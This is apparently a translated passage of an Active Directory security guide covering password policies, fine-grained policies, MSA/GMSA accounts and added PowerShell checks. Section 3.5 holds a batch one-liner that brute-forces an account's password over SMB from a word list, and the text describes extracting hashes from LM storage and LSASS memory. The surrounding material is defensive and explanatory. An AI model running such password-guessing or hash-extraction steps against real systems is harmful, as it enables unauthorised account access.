• To administer Active Directory from a web interface.
• To impose a format on input fields (required fields, format of the phone number, ...).
• To run scripts that perform additional tasks. When a user deletes an account, it is not possible to automatically delete the home directory or the mailbox, for example. These actions must be performed manually.
• To require the approval of a third party before a change is made to an Active Directory object.

The tool Dell ActiveRoles Server 6.9 (ARS 6.9) provides the following features to meet these needs:

• Dynamic groups: a resource is added to a group according to an attribute value or the location of the user (LDAP path). This feature makes it possible, for example, to give intranet access to all internal users of the company (based on the value of the attribute employeeType).

• Temporary groups: an object is added to a group for a limited time. This can be used to give temporary access to a service provider.

• Approval workflows: one or more persons can approve or reject certain actions performed on the directory by others. An action performed on a user account can also trigger, for example, sending an e-mail to that user.

• A customizable web console: the tool comes with an MMC console (easily customized) and a web console. The latter can be fully customized (changes to the object management forms, additional commands, ...). Take the case of a company that uses the attribute extensionAttribute2 to store Office 365 license information. This attribute is not displayed by default in the properties of a user account in the Active Directory Users and Computers console.

• The history of actions taken on an object and of actions taken by an administrative account: managers will be delighted to find who performed a specific action on the directory. Be careful on this point: it is important to delegate administrative rights on the directory only through Dell ActiveRoles Server (ARS). The people in charge of administering the directory should have no access through the native Microsoft tools (ARS does not replicate its permissions into Active Directory).

• Policies: which CIO has not dreamed of one day having a directory that is reliable and respects a validated format? With ARS policies, you can force the teams in charge of directory management to fill in certain fields with a particular format (phone number in international format, last name in capital letters, company and address fields completed, ...). Through its Script Policies module, ActiveRoles Server can run VBS / PowerShell scripts before or after (among others) a form is submitted. Nothing prevents you from automatically configuring application access when a user account is created (provisioning).

• Deprovisioning: ActiveRoles Server also has a deprovisioning function that lets you define a number of tasks to be performed automatically when you want to remove a person's access (the account can be disabled, a script can remove access at the application level, ...).

• Virtual attributes: ActiveRoles Server allows you to create virtual attributes. These do not exist in Active Directory but can be used by ARS scripts. For example, you can create a virtual attribute Site. An ARS policy script can then automatically fill in the address, city and country fields of the user account depending on the value of this Site field.

• Delegation of administration: this is by far the most important feature of ActiveRoles Server. It is possible to delegate rights to administrators only within the ActiveRoles Server tool. These administrators have no rights in Active Directory itself and are therefore forced to use ActiveRoles Server to perform their administrative tasks. This ensures that every administrative action is recorded in the tool. It also lets you delegate rights very precisely without affecting software that relies on Active Directory. You can, for example, prevent HELPDESK users from seeing the organizational units they do not have the right to manage, without disrupting other software that relies on the directory.

The product allows a great many actions but has the following limitations:
• For advanced needs, it will be necessary to write ARS policy scripts. An SDK explains how to develop them, but developing these scripts can take a long time.
• Remember to separate the history database from the configuration database. This is a check box during installation.
• SQL knowledge is recommended, especially if you want to deploy two servers that replicate the same configuration and history databases.



3 DEFINE A CORPORATE PASSWORD POLICY
It is not enough to force users to use a 24-character password with special characters and to make them change it every 30 days to have a secure password policy. With this type of policy, users will simply write their password under their keyboard, on paper or in their mobile phone. The remedy is then worse than the disease. Securing the passwords of user accounts is a much more complex task that requires:

• Listing the needs and constraints of the company regarding passwords.
• Determining how to reduce the number of passwords users have to remember.
• Understanding how and where Active Directory stores passwords. We will see how a domain administrator can recover passwords if they are stored in LM hash format (sometimes it even works with the NT hash).
• Knowing the password management tools built into Active Directory.
• Knowing the third-party tools that extend password management capabilities.
• Reducing the number of user accounts with the option Password never expires.
• Replacing service accounts (which have the option Password never expires) with Managed Service Accounts (MSA) or Group Managed Service Accounts (GMSA).
• Listing all the accounts that have not changed their password for years.
• Knowing how, why and where passwords are stored on domain member machines (other than domain controllers).
• Finally, defining from all of this the target password policy, in coordination with the management of the company, the Helpdesk team (responsible for resetting passwords) and the staff representatives.

3.1 ANALYZE THE BUSINESS NEEDS FOR THE PASSWORD POLICY

The first basic step is to define the company's needs regarding passwords. For this you need to ask yourself the following questions:

• Will users accept a 10-character password that changes every 90 or 120 days (a correct level of security)? Is change management necessary?

• Which user accounts have significant administrative privileges on your information system? These accounts should have a password of 16 characters minimum (24 characters minimum for service accounts).

• What level of security does the company require? Does the company have legal requirements (contract with the Ministry of Defense, financial organization)? Is the security level homogeneous for all departments / users of the company?

• The Active Directory password complexity requirement demands a 6-character password with at least 3 of the 5 existing character types (lowercase, uppercase, digits, special characters, Unicode characters). The password P@ssword is considered a complex password by Active Directory. Are such passwords secure enough for your business?

• Do you have a team in charge of resetting passwords (when a user has forgotten his password)? Is it available 24/7?

• How do you validate that the user calling to reset his password is who he claims to be?

• How do you reset a user's password when he is not connected to the corporate network?

• How many different logins / passwords must users remember?

We will see in the next paragraphs the tools integrated with Active Directory, the third-party solutions and the actions to implement to meet all these business needs.



3.2 REDUCE THE NUMBER OF DIFFERENT LOGINS / PASSWORDS

3.2.1 MINIMIZE THE NUMBER OF LOGINS / PASSWORDS TO REMEMBER

Standard users can on average remember up to 3 different logins / passwords. Beyond that, the following 4 phenomena are observed:

1. If passwords expire every 90/120 days and Active Directory complexity is enabled, users confuse their different passwords. The rate of IT support calls for password reset requests increases sharply.

2. If account lockout is enabled, the rate of IT support calls to unlock accounts increases sharply because users enter their password incorrectly several times.

3. Users write their different logins / passwords on paper, in a text file or behind their keyboard.

4. Users try to align the passwords of their different accounts and change only one character when they change password.

All this penalizes the company's productivity and reduces its security.
It is therefore necessary to reduce the number of logins / passwords a user must remember.

3.2.2 CONFIGURE YOUR APPLICATIONS TO AUTHENTICATE WITH ACTIVE DIRECTORY

Business applications typically allow LDAP authentication over SSL. They often also support authentication protocols such as NTLM or Kerberos. We will see below how to allow Apache on Linux to authenticate users with Kerberos against Active Directory domain controllers.

On an Active Directory domain controller:

Generate the keytab file with the following command:
ktpass /out msreporthttp.keytab /princ HTTP/apache.msreport.be@MSREPORT.BE /mapuser msreporthttp@MSREPORT.BE /ptype KRB5_NT_PRINCIPAL /crypto RC4-HMAC-NT /pass msreporthttppass

This automatically creates a ServicePrincipalName (SPN) on the user account msreporthttp and generates the file msreporthttp.keytab required to implement Kerberos authentication. We will see later in this document what a ServicePrincipalName is.

On the Linux / Apache side:

Download and configure the Kerberos client. Download and configure the Kerberos module for Apache. Configure the NTP client to synchronize with a domain controller. Configure Apache to request authentication and to use the file msreporthttp.keytab generated on the domain controller. For more details on the procedure, I invite you to read the following article:
https://www.johnthedeveloper.co.uk/single-sign-on-active-directory-php-ubuntu
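Kerberos authentication to Apache fails silently when the SPN written by ktpass is missing or, more often, when the same SPN is also registered on another account somewhere in the forest. The following is an added check, not part of the guide's procedure, to run on the domain controller after the ktpass command above; the SPN and account names are the ones used on this page, and the Test-SpnRegistration function is an assumed helper.

```powershell
# Added example (not from the original guide): verify that the SPN created by
# ktpass is registered on exactly one account in the whole forest, and show the
# account attributes that the keytab depends on. Requires the ActiveDirectory module.
Import-Module ActiveDirectory

function Test-SpnRegistration {
    param(
        [Parameter(Mandatory)][string]$Spn,              # e.g. 'HTTP/apache.msreport.be'
        [Parameter(Mandatory)][string]$ExpectedAccount   # e.g. 'msreporthttp'
    )
    # Query a global catalog (port 3268) so that a duplicate SPN registered in
    # another domain of the forest is found as well.
    $gc = "$((Get-ADForest).Name):3268"
    $owners = @(Get-ADObject -LDAPFilter "(servicePrincipalName=$Spn)" -Server $gc `
        -Properties sAMAccountName, servicePrincipalName)

    [pscustomobject]@{
        Spn        = $Spn
        Owners     = @($owners | ForEach-Object { $_.sAMAccountName })
        Registered = ($owners.Count -eq 1 -and $owners[0].sAMAccountName -eq $ExpectedAccount)
        Duplicate  = ($owners.Count -gt 1)     # the KDC cannot pick a key: logons fail
    }
}

Test-SpnRegistration -Spn 'HTTP/apache.msreport.be' -ExpectedAccount 'msreporthttp'

# The account side: ktpass also rewrites userPrincipalName, and the encryption
# types advertised by the account must include the /crypto type in the keytab.
Get-ADUser -Identity 'msreporthttp' -Properties servicePrincipalName, userPrincipalName,
    'msDS-SupportedEncryptionTypes' |
    Select-Object sAMAccountName, userPrincipalName,
        @{ n = 'SPNs'; e = { $_.servicePrincipalName -join ', ' } },
        'msDS-SupportedEncryptionTypes'
```

If Duplicate is $true, remove the SPN from the account that does not own the keytab before testing from the browser; a duplicate is also worth alerting on, since an SPN added to an unexpected account is a classic way to obtain a service ticket for a resource.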



3.2.3 USING THE WINDOWS CREDENTIAL VAULT

If you have applications with a login / password that rarely or never expires (this is not a good practice), you can save the password in the Windows vault. The user will no longer have to enter the login / password, as it will be saved in the user profile. The Windows vault (Credential Manager) is accessible from the Control Panel.

3.2.4 USING IDENTITY FEDERATION PROTOCOLS

CIOs are increasingly switching to applications hosted in the cloud, such as Microsoft Office 365 or SalesForce. These solutions have many advantages but increase the number of logins / passwords that users must memorize.

Identity federation solutions (such as Microsoft ADFS or Ping Identity) address this problem by establishing a trust relationship between an Active Directory configuration (Identity Provider or IDP) and an application hosted in the cloud (Service Provider or SP). The advantage of this solution is that the scope of this trust is much smaller than that of a trust relationship between two domains.



3.3 MICROSOFT PASSWORD MANAGEMENT TOOLS

The password policy for user accounts can be configured in several places:
• At the level of the Password Policy component of the Default Domain Policy Group Policy.
• At the level of PSO containers (Password Settings Objects).
• At the level of Active Directory user accounts.

It is necessary to understand the difference between changing a password and resetting a password. A password change is performed by the user, who must know his old password to perform the procedure. A password reset is performed by an Active Directory administrator, who does not need to know the user's old password. The password history setting (see below) is ignored when a password is reset.

3.3.1 PASSWORD POLICIES IN THE DEFAULT DOMAIN POLICY

With Active Directory domain controllers (all versions), administrators can configure their password policy in the Default Domain Policy under Computer Configuration | Policies | Security Settings | Account Policies | Password Policy. Microsoft defines the following criteria:

Maximum password age:
Active Directory determines whether a password has expired from the value of the attribute pwdLastSet (date of the last password change / reset), the current date and the maximum password age. Note that the attribute pwdLastSet is a counter incremented from January 1, 1601.

Password history:
Active Directory saves a number of old passwords in the attribute ntPwdHistory of the user account (and lmPwdHistory if storage of passwords in LM hash format is enabled). The password history prevents a user from changing his password to a password present in the history. An administrator, however, may reset the password to a value present in the password history.

Minimum password age:
Active Directory prevents a user from changing his password during the set period. The goal is to prevent the user from changing his password X times in a row to bypass the password history. This setting does not prevent a user from changing his password if the option User must change password at next logon was set on the user account by an administrator (after resetting the user's password, for example).

Minimum password length:
A minimum length of 10 characters is recommended for standard users, 16 characters for sensitive users (VIPs, accounts with administrative privileges) and 24 characters for service accounts. This length protects against rainbow tables, which can recover a password from its NT hash (value of the attribute unicodePwd).

Password complexity:
The password must have at least 6 characters, must not contain more than 2 consecutive characters of the account name or of the full name of the account, and must contain 3 of the 5 existing character types (uppercase, lowercase, digits, special characters such as @, and other Unicode characters such as Japanese characters). Complexity is checked only when a user changes his password or when an administrator resets it. Enabling complexity therefore does not guarantee that all user accounts in the directory have a complex password. A password like password1 is considered complex. We will see that third-party tools like Hitachi ID Password Manager extend the complexity criteria (blocking of dictionary words).

Store passwords using reversible encryption:
This option is only used for authentication with the DIGEST protocol. It should not be enabled for security reasons, because the passwords can then easily be decrypted.

Password policies defined in the Default Domain Policy apply to Active Directory user accounts, but also to the user accounts of the local SAM database on domain member machines.

It is important to note that password policies can only be defined in the Default Domain Policy Group Policy, even though the Windows graphical interface suggests that they can be defined in any GPO linked to an OU.

In fact, password policies defined at the OU level apply only to the user accounts of the local SAM database on domain member machines.



3.3.2 PSO OBJECTS (FINE-GRAINED PASSWORD POLICIES)

They let you define the same password policy settings as the Default Domain Policy, but for specific users and groups. PSOs (also called fine-grained password policies) appeared with the Windows 2008 domain functional level. In Windows 2008 R2, PSOs had to be created manually with ADSIEDIT.MSC. Since Windows 2012 R1, a wizard for creating PSOs is available in the Active Directory Administrative Center (ADAC) console. Go to the container System | Password Settings Container. In the Tasks pane, click on New | Password Settings.

In the example below, we create a password policy for all user members of the group GG_Administrative_Accounts.

It is better to define a fine-grained password policy that is at least as strict as the security settings of the Default Domain Policy. The more restrictive of the two is indeed the one that applies to the user. In the example below, the Default Domain Policy requires a password of 8 characters. The PSO requires 15 characters. The user member of the group GG_Administrative_Accounts must have a password of 15 characters.

Other advantages of PSOs (fine-grained password policies):
They apply only to domain user accounts, contrary to the Default Domain Policy, which applies to Active Directory user accounts and to user accounts of the local SAM database. For more information, see the Microsoft link below:
http://technet.microsoft.com/en-us/library/cc770842(v=ws.10).aspx
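The same PSO can be created and verified from PowerShell instead of ADAC, which is convenient when the policy has to be reproduced on several domains. The script below is an added example, not the guide's own procedure: the PSO name, its precedence and the member account admin.test are assumptions; the group name and the 15-character requirement are the ones used above.

```powershell
# Added example (not from the original guide): create the fine-grained password
# policy for GG_Administrative_Accounts with the ActiveDirectory module, then
# show which policy a member actually ends up with.
Import-Module ActiveDirectory

$psoName = 'PSO_Administrative_Accounts'   # assumed name

if (-not (Get-ADFineGrainedPasswordPolicy -Filter { Name -eq $psoName })) {
    # Precedence: when several PSOs apply to one user, the lowest value wins.
    New-ADFineGrainedPasswordPolicy -Name $psoName -Precedence 10 `
        -MinPasswordLength 15 `
        -ComplexityEnabled $true `
        -PasswordHistoryCount 24 `
        -MinPasswordAge (New-TimeSpan -Days 1) `
        -MaxPasswordAge (New-TimeSpan -Days 90) `
        -LockoutThreshold 0 `
        -ReversibleEncryptionEnabled $false
}

# A PSO can only target users and global security groups, never an OU.
Add-ADFineGrainedPasswordPolicySubject -Identity $psoName -Subjects 'GG_Administrative_Accounts'

# Domain default versus the resultant policy for one group member.
$default   = Get-ADDefaultDomainPasswordPolicy
$resultant = Get-ADUserResultantPasswordPolicy -Identity 'admin.test'   # assumed account

[pscustomobject]@{
    Scope             = 'Default Domain Policy'
    MinPasswordLength = $default.MinPasswordLength
    MaxPasswordAge    = $default.MaxPasswordAge
}
if ($resultant) {
    [pscustomobject]@{
        Scope             = "Resultant for admin.test ($($resultant.Name))"
        MinPasswordLength = $resultant.MinPasswordLength
        MaxPasswordAge    = $resultant.MaxPasswordAge
    }
} else {
    'No PSO applies to admin.test: the Default Domain Policy is in force.'
}
```

Get-ADUserResultantPasswordPolicy is the check to keep: it answers the "8 or 15 characters?" question directly for a given account, without guessing which PSOs are linked to which nested groups.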

3.4 THIRD-PARTY PASSWORD MANAGEMENT TOOLS

The native Microsoft tools have many limitations:

• If a user forgets his password, he cannot reset it himself.

• The native Microsoft tools do not guarantee the identity of the user requesting a password reset.

• It is not possible to configure password complexity to ban certain dictionary words.

3.4.1 RESET YOUR PASSWORD WITHOUT CONTACTING THE IT TEAM

The PWM tool (open source and free) provides a web interface for users to reset their password. The user connects to that interface and must answer secret, personal questions such as his favorite band or the nickname of his spouse or pet. Commercial tools such as Hitachi ID Password Manager or Microsoft Forefront Identity Manager also offer this type of function.

The principle of these tools is relatively simple, but their implementation is complex. The personal data stored in these tools requires a declaration to the CNIL and consultation of the unions. The choice of questions can also be highly political and sensitive.

To download PWM: http://code.google.com/p/pwm/

To download a trial version of Hitachi ID Password Manager: http://hitachi-id.com/password-manager/

3.4.2 GUARANTEEING THE IDENTITY OF THE USER

Implementing a password reset tool based on security questions also guarantees the identity of the calling user and protects the company against an attacker posing as an employee of the company to obtain access.

3.4.3 CONFIGURING PASSWORD COMPLEXITY

Password complexity is handled by the Microsoft Windows DLL Passfilt.dll. It is possible to develop an additional DLL to impose more complex passwords and to configure Windows to use this second DLL. Put simply, both DLLs analyze the password supplied by the user. If both return true, the password is accepted. Otherwise, an error message appears and the password change / reset is denied. All the information provided by Microsoft to develop a custom DLL is available at:

http://msdn.microsoft.com/en-us/library/ms721766.aspx
http://msdn.microsoft.com/en-us/library/ms721849.aspx#password_filter_functions
http://msdn.microsoft.com/en-us/library/ms721884.aspx
http://msdn.microsoft.com/en-us/library/ms722458.aspx

There are sample implementations (not tested / not recommended) available at:

https://thangletoan.wordpress.com/2012/08/06/
http://www.devx.com/security/Article/21522/0/page/3
https://mendel129.wordpress.com/2014/05/27/passwordfilters-in-windows/

As this DLL is very critical, it is recommended to invest in a commercial solution like Hitachi ID Password Manager.
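To see why the built-in rules of 3.3.1 are not enough and what a second filter adds, the following added example models both checks in PowerShell: the Passfilt.dll rules as described in this document, then a dictionary check of the kind a custom filter DLL or a product such as Hitachi ID Password Manager performs. It is an illustration written for this page, not Microsoft's code nor a replacement for a filter DLL (which must be native code loaded by LSASS); the word list, the substitution table and the sample account are constructed.

```powershell
# Added example (not from the original guide): model of the built-in Windows
# complexity rules followed by the dictionary rule that third-party filters add.

function Test-BuiltInComplexity {
    param(
        [Parameter(Mandatory)][string]$Password,
        [string]$SamAccountName = '',
        [string]$DisplayName = ''
    )
    # Rule 1: at least 6 characters.
    if ($Password.Length -lt 6) { return $false }

    # Rule 2: must not contain the account name, nor any token of 3+ characters
    # of the full name (tokens are split on the usual separators); case-insensitive.
    if ($SamAccountName.Length -ge 3 -and $Password -match [regex]::Escape($SamAccountName)) { return $false }
    foreach ($token in ($DisplayName -split '[ ,.\-_#\t]+')) {
        if ($token.Length -ge 3 -and $Password -match [regex]::Escape($token)) { return $false }
    }

    # Rule 3: characters from at least 3 of the 5 categories.
    $categories = 0
    if ($Password -cmatch '[A-Z]') { $categories++ }                                     # uppercase
    if ($Password -cmatch '[a-z]') { $categories++ }                                     # lowercase
    if ($Password -match '[0-9]') { $categories++ }                                      # digits
    if ($Password -match '[\x21-\x2F\x3A-\x40\x5B-\x60\x7B-\x7E]') { $categories++ }     # ASCII special characters
    if ($Password -match '[^\x00-\x7F]') { $categories++ }                               # other Unicode characters
    return ($categories -ge 3)
}

# Constructed word list; a real filter loads a full dictionary file.
$script:WeakWords = @('password', 'welcome', 'letmein', 'msreport', 'summer', 'winter')

function Test-ExtendedComplexity {
    param(
        [Parameter(Mandatory)][string]$Password,
        [string]$SamAccountName = '',
        [string]$DisplayName = ''
    )
    # Both filters must accept the password (the "if both return true" rule above).
    if (-not (Test-BuiltInComplexity -Password $Password -SamAccountName $SamAccountName -DisplayName $DisplayName)) {
        return $false
    }
    # Undo common substitutions before the dictionary lookup so that P@ssw0rd
    # is treated as "password".
    $normalised = $Password.ToLowerInvariant() -replace '@', 'a' -replace '0', 'o' `
        -replace '[1!]', 'i' -replace '3', 'e' -replace '[$5]', 's'
    foreach ($word in $script:WeakWords) {
        if ($normalised -match [regex]::Escape($word)) { return $false }
    }
    return $true
}

# Demo on constructed candidates for the account guillaume.mathieu.
foreach ($candidate in 'P@ssword', 'Password1', 'Gm2017!', 'Correct-Horse-42', 'Mathieu2017') {
    [pscustomobject]@{
        Password = $candidate
        BuiltIn  = Test-BuiltInComplexity  -Password $candidate -SamAccountName 'guillaume.mathieu' -DisplayName 'Guillaume Mathieu'
        Extended = Test-ExtendedComplexity -Password $candidate -SamAccountName 'guillaume.mathieu' -DisplayName 'Guillaume Mathieu'
    }
}
```

P@ssword and Password1 pass the built-in rules and fail the extended ones; Mathieu2017 fails both because of the full-name token. The point for a policy discussion is the first column: "complexity enabled" in the Default Domain Policy guarantees no more than what that column shows.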



3.5 RECOVER A USER'S PASSWORD OVER THE NETWORK

To retrieve a user's password over the network, an attacker needs a lot of time. He must not exceed a certain threshold that could trigger lockout of the user account or be detected by an IDS. A reasonable pace would be to test one password per minute. Assuming that the password expires after 60 days, an attacker could test 86400 passwords during this period.

The script below tests all the passwords in the file c:\password.txt (one password per line) for the account guillaume on the machine 192.168.1.15. If the command succeeds, a drive V: is mapped to the C$ share of the machine.
for /F %i in (c:\password.txt) do @net use V: \\192.168.1.15\c$ %i /user:guillaume

How to protect yourself: account lockout and auditing of logon failures

Users should have passwords of at least 10 characters with complexity enabled. This will generally ensure that an attacker does not succeed in finding the password in less than 86400 attempts.

Enabling account lockout with very low thresholds (a few failed passwords) will mainly block clumsy users or those who no longer remember their passwords. It is better to set account lockout to high thresholds and to record these authentication failures over a longer period. Microsoft caps the threshold at 999 attempts. The duration after which the failed password counter is reset must also be considered, as it also sets the duration of the account lockout (stress the Microsoft solution).

If account lockout is enabled, an attacker can deliberately enter bad passwords to cause a massive denial of service. It is mainly for this reason that, in my opinion, account lockout should be turned off.

An alternative method to account lockout is to analyze the Security log of all domain controllers looking for authentication failures and to generate an alert on detection. This method would also detect low-rate connection attempts (one password per minute) by counting the number of authentication failures over the long term. A sample script is provided later in this document (audit section).
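The long-window counting just described can be prototyped on constructed data before it is wired to the domain controllers' Security logs. The block below is an added example written for this page (the guide's own audit script comes later in the document): the two event patterns, the 24-hour window and the threshold of 50 failures are constructed assumptions, and the Get-WinEvent call in the comment is the real source to substitute in production.

```powershell
# Added example (not from the original guide): detect slow password guessing by
# counting logon failures per (account, source IP) over a long sliding window,
# which a per-attempt lockout threshold never sees. In production, build $events
# from the domain controllers' Security logs, e.g.
#   Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625, 4771 } -ComputerName <DC>
# parsed into the same three fields (TimeCreated, TargetUserName, IpAddress).

$sampleEvents = @()
$start = [datetime]'2017-01-30 00:00:00'

# Constructed pattern 1: one bad password per minute for 3 hours against
# 'guillaume' from 192.168.1.15, i.e. the pace discussed above.
for ($i = 0; $i -lt 180; $i++) {
    $sampleEvents += [pscustomobject]@{
        TimeCreated = $start.AddMinutes($i); TargetUserName = 'guillaume'; IpAddress = '192.168.1.15'; Id = 4625
    }
}
# Constructed pattern 2: a user who mistyped his password three times in the morning.
foreach ($m in 540, 541, 543) {
    $sampleEvents += [pscustomobject]@{
        TimeCreated = $start.AddMinutes($m); TargetUserName = 'marie'; IpAddress = '10.0.0.23'; Id = 4625
    }
}

function Find-SlowPasswordGuessing {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$WindowHours = 24,   # assumed: look back a full day, not a lockout observation window
        [int]$Threshold   = 50    # assumed: far above what a forgetful user produces
    )
    $alerts = @()
    foreach ($group in ($Events | Group-Object TargetUserName, IpAddress)) {
        $sorted = @($group.Group | Sort-Object TimeCreated)
        # Sliding window anchored on each failure: count the failures that follow
        # it within WindowHours. One alert per (account, source) pair.
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $windowEnd = $sorted[$i].TimeCreated.AddHours($WindowHours)
            $count = @($sorted | Where-Object {
                $_.TimeCreated -ge $sorted[$i].TimeCreated -and $_.TimeCreated -le $windowEnd
            }).Count
            if ($count -ge $Threshold) {
                $alerts += [pscustomobject]@{
                    TargetUserName = $sorted[0].TargetUserName
                    IpAddress      = $sorted[0].IpAddress
                    Failures       = $count
                    FirstSeen      = $sorted[$i].TimeCreated
                    WindowHours    = $WindowHours
                }
                break
            }
        }
    }
    return $alerts
}

# On the sample data only the guillaume / 192.168.1.15 pair is reported (180 failures);
# marie's 3 mistakes stay below the threshold.
Find-SlowPasswordGuessing -Events $sampleEvents | Format-Table -AutoSize
```

The grouping key matters: counting per account alone also catches guessing spread across several sources, while counting per source IP alone catches password spraying (one or two attempts against many accounts); a production version should run both groupings.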

3.6 USE MSA AND GMSA OBJECTS FOR SERVICES AND SCHEDULED TASKS

For many customers, user accounts are used to run services and scheduled tasks. These accounts usually have very high privileges (sometimes Domain Admins), have a password that never expires and are not restricted in their use. They can, for example, open a session on any machine of the domain. If a service is compromised with a tool like Metasploit, the attacker obtains the access of the user account running that service (in our example, a member of the group Domain Admins). He can also recover the password of the service account by analyzing the memory of the LSASS.EXE process of the machine with a tool like CAIN (for more information, see later in this document).



Microsoft began offering a solution with Windows 2008 R2 and MSA (Managed Service Accounts). An MSA is a new object type (class msDS-managedserv…).

An MSA, like a computer account, automatically changes its password every 30 days (at the same time as the password of the computer account). The password policies of the Default Domain Policy and the PSO settings do not apply to an MSA. A Managed Service Account (MSA) has, however, some limitations:

• It is not possible to use the same MSA on several machines. It is linked to a specific computer account. It is therefore not possible to use an MSA with a Microsoft Failover cluster or NLB cluster (no more Kerberos authentication).

• Many applications do not support MSAs. It is therefore necessary to validate MSA support for each application. Microsoft SQL Server 2012 supports an MSA if SQL Server is deployed in standalone mode (not clustered). For more information:
http://blogs.msdn.com/b/sqlosteam/archive/2014/02/19/msa-accounts-used-with-sql.aspx

I invite you to read the following Microsoft articles for more information on MSAs:
http://blogs.technet.com/b/askds/archive/2009/09/10/managed-service-accounts-understandingimplementing-best-practices-and-troubleshooting.aspx
http://technet.microsoft.com/fr-fr/library/dd548356(v=ws.10).aspx

Microsoft improved MSAs in Windows 2012 R2 and created a new object type (class msDS-GroupManagedServiceAccount) called Group Managed Service Account (GMSA). Contrary to an MSA, a GMSA is no longer linked to the computer account of a machine. It is the Kerberos Key Distribution Center (KDC) service that changes the password of a GMSA. The same GMSA object can be used on different machines. The Failover cluster service itself should not run with a GMSA, but the services hosted by the cluster can. This was not possible with an MSA object. Note that GMSAs are not yet supported by Microsoft SQL Server 2012 (contrary to MSAs). I invite you to read the following Microsoft articles on GMSAs:

http://blogs.technet.com/b/askpfeplat/archive/2012/12/17/windows-server-2012-group-managedservice-accounts.aspx
http://technet.microsoft.com/en-us/library/jj128431 (US)
http://technet.microsoft.com/fr-fr/library/hh831782.aspx (FR)

MSAs and GMSAs are stored in the container Managed Service Accounts at the root of the domain.

How to configure the VMware Tools service on the machine SRV2012C with an MSA:
Install the Active Directory module for PowerShell on SRV2012C from Server Manager. Then type the following command to create the MSA object:
New-ADServiceAccount vmwaretools -RestrictToSingleComputer
By default in Windows 2012, the command New-ADServiceAccount creates a GMSA; the parameter -RestrictToSingleComputer creates an MSA. Associate the MSA with the computer account:
Add-ADComputerServiceAccount -Identity SRV2012C -ServiceAccount vmwaretools
Install the MSA on SRV2012C:
Install-ADServiceAccount vmwaretools
Validate that the MSA works with the following command:
Test-ADServiceAccount vmwaretools
Check that the object created is an MSA and not a GMSA. Add the MSA to the Administrators group of the local SAM database of the machine. Configure the VMware Tools service to use the MSA.
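The GMSA counterpart of the MSA procedure above, for the multi-host case the text says an MSA cannot cover, follows as an added example (written for this page, not taken from the guide or from Microsoft's documentation). The account name gmsa_svc, the host group GG_SQL_Hosts, the hosts SRV2012C / SRV2012D and the SPN are assumptions; the domain msreport.intra is the one used elsewhere on this page.

```powershell
# Added example (not from the original guide): create a GMSA that two hosts can
# share, then install and test it on one host. Requires the ActiveDirectory
# module and Windows 2012 (or later) domain controllers.
Import-Module ActiveDirectory

# 1. KDS root key, once per forest: the KDC derives every GMSA password from it.
#    -EffectiveImmediately is for a lab; in production run Add-KdsRootKey without
#    it and wait for the 10-hour replication delay before creating GMSAs.
if (-not (Get-KdsRootKey)) {
    Add-KdsRootKey -EffectiveImmediately
}

# 2. The computers allowed to retrieve the password. Unlike an MSA, several
#    hosts (cluster nodes, NLB members) can share one GMSA through a group.
if (-not (Get-ADGroup -Filter { Name -eq 'GG_SQL_Hosts' })) {
    New-ADGroup -Name 'GG_SQL_Hosts' -GroupScope Global -GroupCategory Security
}
Add-ADGroupMember -Identity 'GG_SQL_Hosts' -Members (Get-ADComputer SRV2012C), (Get-ADComputer SRV2012D)

# 3. The GMSA itself (objectClass msDS-GroupManagedServiceAccount). The KDC
#    rotates its password; the interval can only be set at creation time.
New-ADServiceAccount -Name 'gmsa_svc' -DNSHostName 'gmsa_svc.msreport.intra' `
    -PrincipalsAllowedToRetrieveManagedPassword 'GG_SQL_Hosts' `
    -ServicePrincipalNames 'MSSQLSvc/srv2012c.msreport.intra:1433' `
    -ManagedPasswordIntervalInDays 30

# 4. On each host, after a reboot so that the new group membership is in the
#    computer's token: install and test the account. No Add-ADComputerServiceAccount
#    step is needed for a GMSA.
Install-ADServiceAccount -Identity 'gmsa_svc'
Test-ADServiceAccount -Identity 'gmsa_svc'     # $true when the host can retrieve the password

# 5. Confirm the object type and who may read its password. The service is then
#    configured with the logon account MSREPORT\gmsa_svc$ and an empty password.
Get-ADServiceAccount -Identity 'gmsa_svc' `
    -Properties ObjectClass, PrincipalsAllowedToRetrieveManagedPassword, ManagedPasswordIntervalInDays |
    Select-Object Name, ObjectClass, PrincipalsAllowedToRetrieveManagedPassword, ManagedPasswordIntervalInDays
```

The value of PrincipalsAllowedToRetrieveManagedPassword is the security boundary of a GMSA: any computer (or user) listed there can read the current password, so review that attribute the same way you would review the members of a privileged group.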
3.7 LIST ALL ACCOUNTS THAT HAVE NOT CHANGE PASSWORDS FOR SEVERAL YEARS

It is necessary to identify accounts that have not changed their passwords from more than 5 to 10 years (configured with a password that never
expires). These are usually former generic service accounts, non-nominal, known to all IT staff and employees / providers who are not part of
society, the use of which is not well known (several applications use the same Service account).

The approach:
1. Identify the applications that use these service accounts with the Active Directory logon auditing feature (see later in this document).

2. Assess the security risk of each account. Is the password complex? Is it known to former employees or providers? What is the privilege level of the account?

3. Plan password change campaigns for service accounts. Whenever possible, give service accounts passwords of at least 24 characters. A password longer than 14 characters cannot be stored as an LM hash, so this also guarantees that no L hash of the new password lands in the directory.

If the password of a service account cannot be changed, reset it to its current value, after disabling LM hash storage (see later in this document), as many times as the password history length plus one. If the history keeps 15 passwords, reset the password 16 times.

If the password does not meet the complexity requirements, temporarily relax the Default Domain Policy so that the password can be set again to the same value (for really blocking cases only).

The same action is needed after disabling LM hash storage for accounts that already exist: the LM hash held in the dBCSPwd attribute is only removed when the account password is next changed.

Some technical tips:

The following PowerShell command lists the accounts whose password has not been changed for 365 days. It requires the Dell ActiveRoles Management Shell 1.6 PowerShell module and works with Windows 2003 and later domain controllers (free download: http://software.dell.com/fr-fr

Add-PSSnapin Quest.ActiveRoles.ADManagement
Get-QADUser -PasswordNotChangedFor 365



3.8 RESET THE PASSWORDS OF SMART CARD USERS

During an interactive logon (local or through Remote Desktop), users can authenticate with their smart card instead of a login and password. Access to network resources, however, is still done transparently by the system with the NT hash of the account password (NTLM): this NT hash is kept in the memory of lsass.exe after the interactive logon. Moreover, when the Smart card is required for interactive logon box is checked, the system generates a random password for the account and never changes it afterwards, so the same NT hash stays valid for years and can be replayed by anyone who extracts it.

For this reason, it is advisable to reset the password of these accounts periodically (for example every 6 months); the simplest way is to uncheck and re-check the option, which makes the domain controller generate a new random password. Perform this action when the user is not working. At the Windows Server 2016 domain functional level, the Rolling of expiring NTLM secrets during sign on setting automates this rotation.

3.9 RESTRICT THE USE OF THE "PASSWORD NEVER EXPIRES" OPTION

